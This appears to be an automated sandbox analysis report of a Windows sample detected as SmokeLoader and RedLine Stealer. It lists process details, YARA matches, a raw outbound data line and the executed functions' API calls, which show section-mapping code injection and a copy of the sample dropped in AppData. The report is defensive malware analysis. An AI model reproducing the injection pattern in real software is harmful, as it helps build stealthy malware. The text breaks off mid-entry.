Oct 19, 2024 06:46:05.412570000 CEST	189	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 40 e8 e9 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vur@O0^nQnrmQw0"IRi"3BI @tC+4A,r"

Target ID:	0
Start time:	00:41:58
Start date:	19/10/2024
Path:	C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe"
Imagebase:	0x400000
File size:	454'144 bytes
MD5 hash:	EA2E25EFD40CEBD5E9535B91D8E3F61F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:42:03
Start date:	19/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	00:42:22
Start date:	19/10/2024
Path:	C:\Users\user\AppData\Roaming\vbirvce
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vbirvce
Imagebase:	0x400000
File size:	454'144 bytes
MD5 hash:	EA2E25EFD40CEBD5E9535B91D8E3F61F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	40.7%
Signature Coverage:	44.9%
Total number of Nodes:	118
Total number of Limit Nodes:	4

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 00514696 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005146BE
Module32First.KERNEL32(00000000,00000224), ref: 005146DE

Memory Dump Source

Source File: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, Offset: 00502000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_502000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d3a56f70c76ca7385493541348af3d08c52dbaa7e85a8dcb63c8bfe4e4efd841
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 19F062362007116BE7207AF5988DAAE7AECBF4A729F101528E656914C0DB70EC854E61

Function 0062003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D

Strings

cess, xrefs: 0062018D
kernel32.dll, xrefs: 0062008F, 00620095

Memory Dump Source

Source File: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 42ec4702e70d4e90e99a8a4f860a1c510c2e99c0fd791167ea9c40f41969c617
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: FB526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14

Function 00620E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E

Memory Dump Source

Source File: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ca7d39d3f00bb23aeb65542139c9111eb9232972a72a4ee517b453a7e7f206fa
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: FCD0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9581C770994046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 00514355 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005143A6

Memory Dump Source

Source File: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, Offset: 00502000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_502000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 2e72311935caa81f1f60a3eb1c07717b857d4a60658e4b78159fa52134426183
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: E8113C79A00208EFDB01DF98C989E98BFF5AF08350F158094F9489B362D371EA90DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Non-executed Functions

Function 0062092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 006209DC, 006209DF, 006209E4
., xrefs: 0062095F
l, xrefs: 00620966

Memory Dump Source

Source File: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2ba7ce5c814ab9565d4597d47c006d941323b89efae0f9c485d6973fd74c974a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: BF3138B6901619DFEB10CF99D880AEDBBF6FF48324F14504AD441A7312D771AA85CFA4

Function 00513F73 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, Offset: 00502000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_502000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 38efa1cd337de8c330a452f82f6c6d5c4ca14f215bb635552ecaedd8b6e5a9be
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 4E11AC72740100AFE704CE55DC91EE677EAFB89320B2980A5ED04CB312D679EC82C760

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 00620D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 24baee486935e57d3a0b741057cb9f05ffc7e32a8ab280632829428391162b7e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0301F776601A108FEF21CF60E804BEA33F7EF85305F0548E4D90697342E770A8418F80

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
